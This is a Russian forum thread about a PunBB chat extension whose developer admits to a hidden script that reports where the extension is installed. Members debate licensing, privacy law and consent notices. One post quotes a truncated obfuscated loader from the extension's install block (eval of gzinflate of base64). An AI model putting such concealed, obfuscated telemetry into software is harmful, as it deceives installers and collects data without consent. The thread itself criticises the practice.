176

Re: [Релиз] Live chat

sempai пишет:

alexey.kopchenko, дорабатывайте все что угодно для себя, на публикацию любой части моих расширений, как и модификаций оных, я права никому не давал!

Вы пишете свои расширения под лицензией GPL2.0 (они наследуются от punbb), поэтому, на мой взгляд, давали.

Поделиться

177

wunt пишет:
sempai пишет:

alexey.kopchenko, дорабатывайте все что угодно для себя, на публикацию любой части моих расширений, как и модификаций оных, я права никому не давал!

Вы пишете свои расширения под лицензией GPL2.0 (они наследуются от punbb), поэтому, на мой взгляд, давали.

Не пишет а распространяет, большая разница

Захочешь — найдешь время, не захочешь — найдешь причину.

Поделиться

178

Вот волна поднялась, ведь если бы все себя "обезличили", проствляли бы ссылки на свои форумы и не терли бы копирайты, глядишь и вопросов бы таких не было, и о PunBB, бы узнало больше потенциальных пользователей, и в темах общались бы не пару-тройку пользователей, а десятки....

P.S. ребята во все, распостраняемые мной расширения, встроен скрипт, мониторящий установку этих расширений. Ибо мне интересно, на скольких форумах эти самые расширения установлены, и сколько человек их использует.

Если в данной, или других темах (автором которых я являюсь), вам не спешат ответить. Проверьте правильно ли заполнен ваш профиль на форуме, указанна ли в нем ссылка на ваш собстаенный форум, ну и наличие аватарки тоже приветствуется. Ибо мне, как разработчику расширений, интересно общаться с реальными пользователями и владельцами форумов на платформе PunBB, а не с "обезличинными" никами.

P.S. к удалению копирайтов платформы PunBB, отношусь крайне негативно, владельцев форумов без копирайтов платформы, просьба не беспокоить!

Сайт sempai

Поделиться

179

sempai, Я знаю, как тебя заспамить https://krokovod.org/forum/extensions/pan_smiles/pack/img/hitry.gif

sempai пишет:

bibishnik, спасибо учту!

https://krokovod.org/forum/extensions/pan_smiles/pack/img/ai.gifНик в паспорте чужой напишешь?

krokovod.org: (Please log in or register to see this URL)
punbb.info: (Please log in or register to see this URL)
PanBB 1.4.5: (Please log in or register to see this URL)

Сайт kisa

Поделиться

180

kisa, я то же smile)))

P.S. поэтому и не хотел об этом расспостранятся.

Сайт sempai

Поделиться

181

kisa, не смешно, с точки зрения законов РФ это не гласное получение информации. Администратор идентифицируется по почте и по ресурсу которым он управляет.
Статья 137. Нарушение неприкосновенности частной жизни.
Статья 138. Нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений

Без разрешения в РФ нельзя..    Подробности и комментарии к статьям можно найти, они в открытом виде. Из практики могу сказать, что граждан из других стран могут запросить на выдачу (если гражданин РФ находится в другой стране и есть договоренности о выдаче) или задержать прямо при пересечении границы РФ даже если нет гражданства РФ, по крайней мере до выяснения (выяснять могу очень долго, даже не недели... )

Скептикам. В РФ законы относительно выше озвученных вариантов работают вполне хорошо, достаточно одного заявления от любого обидевшегося админа.   За подобное деяние на выходе не посадят, но шрафака влепят весьма увесистого ( от 100 тыс рублей и выше), ну и в списки "какеров" пожизненно.

sempai, а если будет предупреждение до момента сбора статистики, что ведется сбор статистики  - все законно.

Поделиться

182

bibishnik,
1) Какое счастье, что я давно далеко от этой страны (надеюсь никто не обидится).
2) По мере обновления расширений, добавлю инфу в описание в манифестах.

Сайт sempai

Поделиться

183

sempai, не по теме конечно,  но посмотри на те же законы Европы. Чем стабильней государственная машина, тем крепче затягиваются гайки.  Относительно законов о сохранении информации все вполне адекватно, если рассматривать вопрос со стороны безопасности и неприкосновенности частной жизни (в Европе кстати также и даже круче, например в Германии).
Оффтопим..

Поделиться

184

bibishnik, это да, главное что бы государство не перегибало. На тему Евросоюза, недавно как раз разрабатывал расширение, оповещающее посетителей форума о использовании cookie

Да давай наверное на этом закончим оффтопить в данной теме, если есть необходимость, можно создать соответствующую тему в подходящем разделе!

Сайт sempai

Поделиться

185

bibishnik, позволю себе не согласиться.
Расширение предоставляется вебмастеру с открытым кодом и на него распространяется лицензия GNU \GPL, которая содержит пункты отказа от ответственности, благодаря чему все риски и ответственность переходят к вебмастеру.  Вебмастер может (по идее даже должен) прочитать код, чтобы иметь представление о том что этот код делает.  Если его не устраивает что-то - он меняет код в соответствии со своими потребностями  или не использует его, это его право и оно урегулировано лицензией.
Я конечно не юрист,  но требование включить предупреждение, как и угроза риска применения законодательства в части защиты информации безосновательны.

Поделиться

186

hcs,в РФ в полной мере CNU/GPL не работает, у нас все опирается на нормативные акты. Они в принципе практически совместимы с GPL, но не полностью. Думаю, что в этой части еще будут поправки законодательства.   По нашим законам надо заключать двухсторонний договор, оформить можно даже в электронном виде (галочка на согласие), тогда лицензия автоматически переходит в договор оферты. (вот такие тонкости нашего ГК)
Статья 421 ГкРФ
2. Стороны могут заключить договор, как предусмотренный, так и не предусмотренный законом или иными правовыми актами. К договору, не предусмотренному законом или иными правовыми актами, при отсутствии признаков, указанных в пункте 3 настоящей статьи, правила об отдельных видах договоров, предусмотренных законом или иными правовыми актами, не применяются, что не исключает возможности применения правил об аналогии закона (пункт 1 статьи 6) к отдельным отношениям сторон по договору.

Включать предупреждение можно просто текстовым файлом в архиве, обычно туда полный текст лицензии загоняют.
Предупреждение о сборе информации должно быть явно видным.  Многие же ставили программы, например тот же VLC плеер да и тысячу других программ, там сразу при первой загрузке предупреждают и предлагают (собирать данные/отказаться от сбора.... отправлять отчет/не отправлять отчет)

Добавлено спустя 1 час 5 минут 20 секунд:

hcs пишет:

Я конечно не юрист,  но требование включить предупреждение, как и угроза риска применения законодательства в части защиты информации безосновательны.

Предупреждение является частью договора оферты и не более.   Если программа или ее часть (читай расширение) содержит заведомо вредоносный код (негласное получение информации, бэкдор, зашифрованный код ), это уже распространение вредоносного кода. 

hcs пишет:

Вебмастер может (по идее даже должен) прочитать код, чтобы иметь представление о том что этот код делает.

Если программа содержит участок зашифрованного кода, нужно снабжать дополнительным соглашением к договору или разместить код без шифрования.   Тут без идей, участок кода закрыт в конкретном случае даже если он расшифровывается на раз-два.

<install><![CDATA[
eval(gzinflate(base64_decode('FZdFrsVKskWHU+/JDTPpt8x4zNwpmZnZo/+3BpCKVGTkjrXKKx3+qb92qob0KP/J0r0ksP8WZT4X5T//4ZNChTCNOOcA/I6R/NU1......

Поделиться

187

Пожалуй что форумный инсталлер надо дополнить дополнительной возможностью, чтобы расширение при установке могло  вывести доп условия и галку согласия, без которой не установишь расширение.  Типа как согласие с правилами форума при регистрации. Такой вариант решает эти вопросы юридического характера?

Поделиться

188

hcs пишет:

Типа как согласие с правилами форума при регистрации. Такой вариант решает эти вопросы юридического характера?

Да, полностью.  Просто включить пункт о возможности статистического сбора информации (указать какой).

Как правило это обезличенная информация. Например у рекламных сетей, где все пишется через Cookie и идентификация (обезличенная, по цифровому коду) работает только через них.    Если собирать адреса почты и тем более с привязкой их к конкретным сайтам - надо включать дополнительный разъясняющий параграф соглашения, то есть, явно указать какая информация и в каком виде собирается.  Тогда все будет полностью прозрачно и законно, так как  пользователь сам решает отдавать ему эту информацию или отказаться.   Галку поставил, кнопку нажал - согласился.  Аналогию можно подсмотреть в любой мобильной ОС, когда ставится приложение из неизвестных источников (мол, на ваш страх и риск, мы не отвечаем за последствия).

Поделиться

189

bibishnik, информация должна быть на языке системы (форума), или можно написать только на английском?

Сайт sempai

Поделиться

190

sempai, язык договора является правом выбора сторон, так как договор заключается в виде оферты (та как нет возможности переговоров о использовании языка договора), необходимо его перевести на Русский (для России), для других стран не интересовался даже.

Поделиться

191

Расширение обновлено. Багфикс + добавлено пользовательское соглашение.

Сайт sempai

Поделиться